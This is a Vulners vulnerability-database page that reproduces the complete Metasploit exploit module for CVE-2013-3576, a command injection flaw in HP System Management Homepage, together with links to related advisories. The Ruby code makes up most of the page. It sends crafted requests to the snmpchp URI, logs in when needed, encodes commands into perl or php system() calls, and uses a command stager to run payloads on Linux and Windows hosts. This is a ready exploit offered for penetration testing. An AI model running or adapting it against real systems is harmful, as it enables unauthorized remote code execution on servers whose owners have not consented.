Lucene search
K

HP System Management Homepage JustGetSNMPQueue Command Injection

🗓️ 02 Aug 2013 16:49:03Reported by Markus Wulftange, sinn3r <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 48 Views

HP System Management Homepage JustGetSNMPQueue Command Injection exploi

Related
Code
ReporterTitlePublishedViews
Family
0day.today
HP System Management Homepage JustGetSNMPQueue Command Injection
22 Jun 201300:00
zdt
ATTACKERKB
CVE-2013-3576
14 Jun 201300:00
attackerkb
Circl
CVE-2013-3576
24 Jun 201300:00
circl
Check Point Advisories
HP System Management Home Page Command Injection (CVE-2013-3576)
6 Jun 201300:00
checkpoint_advisories
CVE
CVE-2013-3576
14 Jun 201318:00
cve
Cvelist
CVE-2013-3576
14 Jun 201318:00
cvelist
d2
DSquare Exploit Pack: D2SEC_HPSMH
14 Jun 201318:55
d2
Dsquare
HP System Management Homepage RCE
10 Jul 201300:00
dsquare
Exploit DB
HP System Management Homepage - JustGetSNMPQueue Command Injection (Metasploit)
24 Jun 201300:00
exploitdb
Tenable Nessus
HP System Management Homepage ginkgosnmp.inc Command Injection
25 Sep 201300:00
nessus
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::CmdStager
  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "HP System Management Homepage JustGetSNMPQueue Command Injection",
      'Description'    => %q{
        This module exploits a vulnerability found in HP System Management Homepage.  By
        supplying a specially crafted HTTP request, it is possible to control the
        'tempfilename' variable in function JustGetSNMPQueue (found in ginkgosnmp.inc),
        which will be used in a exec() function.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Markus Wulftange',  # Discovery & multi-platform Metasploit module
          'sinn3r'             # initial Windows Metasploit module
        ],
      'References'     =>
        [
          ['CVE', '2013-3576'],
          ['OSVDB', '94191'],
          ['US-CERT-VU', '735364']
        ],
      'DefaultOptions' =>
        {
          'SSL' => true
        },
      'Platform'       => %w{ linux win },
      'Targets'        =>
        [
          ['Linux', {
            'Platform' => 'linux',
            'Arch' => ARCH_X86,
            'CmdStagerFlavor' => 'bourne'
          }],
          ['Linux (x64)', {
            'Platform' => 'linux',
            'Arch' => ARCH_X64,
            'CmdStagerFlavor' => 'bourne'
          }],
          ['Windows', {
            'Platform' => 'win',
            'Arch' => ARCH_X86,
            'CmdStagerFlavor' => 'vbs'
          }],
          ['Windows (x64)', {
            'Platform' => 'win',
            'Arch' => ARCH_X64,
            'CmdStagerFlavor' => 'vbs'
          }],
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2013-06-11'
    ))

    register_options(
      [
        Opt::RPORT(2381),
        # USERNAME/PASS may not be necessary, because the anonymous access is possible
        OptString.new("USERNAME", [false, 'The username to authenticate as']),
        OptString.new("PASSWORD", [false, 'The password to authenticate with'])
      ])
  end

  def post_auth?
    true
  end

  def check
    @cookie = ''

    sig = Rex::Text.rand_text_alpha(10)
    cmd = "echo #{sig}&&whoami&&echo #{sig}"

    res = send_command(cmd)
    if not res
      vprint_error("Connection timed out")
      return Exploit::CheckCode::Unknown
    end

    if res.code == 200 && res.body =~ /#{sig}/
      vprint_good("Running with user '#{res.body.split(sig)[1].strip}'")
      return Exploit::CheckCode::Vulnerable
    end

    Exploit::CheckCode::Safe
  end


  def login
    username = datastore['USERNAME']
    password = datastore['PASSWORD']

    cookie = ''

    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => '/proxy/ssllogin',
      'vars_post' => {
        'redirecturl'         => '',
        'redirectquerystring' => '',
        'user'                => username,
        'password'            => password
      }
    })

    if not res
      fail_with(Failure::Unknown, "#{peer} - Connection timed out during login")
    end

    # CpqElm-Login: success
    if res.headers['CpqElm-Login'].to_s =~ /success/
      cookie = res.get_cookies.scan(/(Compaq\-HMMD=[\w\-]+)/).flatten[0] || ''
    end

    cookie
  end


  def setup_stager
    execute_cmdstager(:temp => './', :linemax => 2800)
  end


  def execute_command(cmd, opts={})
    # Encodes command as sequence of hex values to be passed to the Perl/PHP
    # function `pack("N*", ...)` that is then used in a `system(...)` call.

    # trailing bytes need to be handled separately
    rem = cmd.size % 4
    if rem != 0
      last_bytes = ".chr(#{cmd[-rem..-1].each_byte.map(&:ord).join(").chr(")})"
      cmd = cmd[0...-rem]
    end

    # convert double words into hex representation
    dwords = cmd.each_byte.each_slice(4).map { |dw|
      sprintf("0x%x", dw.pack("C*").unpack("N")[0])
    }

    # build final Perl/PHP code that is getting executed
    script_code = "system(pack(chr(78).chr(42),#{dwords.join(",")})#{last_bytes});"

    # build Perl/PHP invocation command
    case target.opts['Platform']
    # Perl for Linux as it's more likely to be in the PATH
    when "linux" then cmd = "perl -e '#{script_code}'"
    # PHP for Windows
    when "win"   then cmd = "php -r #{script_code}"
    end

    res = send_command(cmd)
    if res && res.code != 200
      vprint_error("Unexpected response:\n#{res}")
      fail_with(Failure::Unknown, "There was an unexpected response")
    end
  end


  def send_command(cmd)
    if !datastore['USERNAME'].to_s.empty? && !datastore['PASSWORD'].to_s.empty? && @cookie.empty?
      @cookie = login
      if @cookie.empty?
        fail_with(Failure::NoAccess, "#{peer} - Login failed")
      else
        print_good("Logged in as '#{datastore['USERNAME']}'")
      end
    end

    req_opts = {}
    req_opts['uri'] = generate_uri(cmd)
    unless @cookie.empty?
      browser_chk = 'HPSMH-browser-check=done for this session'
      curl_loc    = "curlocation-#{datastore['USERNAME']}="
      req_opts['cookie'] = "#{@cookie}; #{browser_chk}; #{curl_loc}"
    end

    send_request_raw(req_opts)
  end


  def generate_uri(cmd)
    "#{normalize_uri("smhutil","snmpchp/")}&#{cmd.gsub(/ /, "%20")}&&echo"
  end


  def exploit
    @cookie = ''

    setup_stager
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation